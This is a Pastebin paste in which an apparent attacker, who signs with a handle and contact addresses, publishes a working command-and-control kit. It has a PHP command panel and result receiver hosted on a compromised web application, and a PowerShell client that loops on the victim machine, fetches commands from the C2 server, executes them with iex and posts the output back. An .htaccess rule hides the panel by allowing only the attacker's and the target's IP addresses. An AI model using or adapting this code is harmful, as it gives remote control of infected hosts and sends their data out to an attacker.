Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ________________________________________
- / Vegeta_Ssj : Command to Control Server \
- \ On Compromised Webapplication /
- ----------------------------------------
- \ ^__^
- \ (oo)\_______
- (__)\ )\/\
- ||----w |
- || ||
- email: vegeta_ssj@riseup.net
- jid: vegeta@exploit.im / vegeta_ssj@4cjw6cwpeaeppfqz.onion
- https://saiyajinz.sytes.net
- https://i.postimg.cc/XYgzjC5c/1.png
- Attacker/Compromised WebApp:
- [windrcmm@server163 c2]$ ls
- command.txt index.php json.php json.txt output.txt post.php
- index.php | Simple page that will send post request with command and display output from infected host.
- <!DOCTYPE html>
- <head><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><title>c&c</title>
- <meta http-equiv="refresh" content="10" />
- </head>
- <body>
- <center>
- <form name="yolo" id="banjolo"action="http://localhost/c2/post.php" method="post">
- <p>
- <b>Enter Command:</b><br>
- <input type="text" name="lolo" id="banjolo" class="input" value="" size="112" autocapitalize="off" />
- </p></p></form>
- <div><object width="700" height="700" data="/c2/json.txt"></object></div>
- </center>
- </body
- </html>
- post.php | The php script that will receive the post request with command and save it to the txt file:
- <?php
- header ('Location: http://localhost/c2');
- $handle = fopen("/home/windrcmm/www/c2/command.txt", "w");
- foreach($_POST as $variable => $value) {
- fwrite($handle, $variable);
- fwrite($handle, "=");
- fwrite($handle, $value);
- fwrite($handle, "\r\n");
- }
- fclose($handle);
- exit;
- ?>
- json.php | A php script that will receive data in json format sent from an infected station and save it to a text file.
- <?php
- $jsonString = file_get_contents("php://input");
- $myFile = "json.txt";
- file_put_contents($myFile,$jsonString);
- ?>
- Target/ Powershell Client:
- #CremeDeLaCreme c&c client
- while($true)
- {
- $res=Invoke-WebRequest “http://localhost/c2/command.txt”
- $www = $res.ParsedHtml.body.innerText;$request = $www -replace ‘command=’
- $execute = $request | iex | Out-String
- $param = @{
- Uri = "https://localhost/c2/json.php"
- Method = "Post"
- Body = $execute
- ContentType = "application/json"
- }
- Invoke-RestMethod @param
- }
- .htaccess | I secure the path to my c2 by allowing only my and my target ip addresses. You can add second layer by basic authentication.
- RewriteEngine on
- RewriteCond %{REMOTE_ADDR} !185.10.68.218$
- RewriteCond %{REMOTE_ADDR} !98.98.98.98$
- RewriteRule ^/?c2 - [F]
Add Comment
Please, Sign In to add comment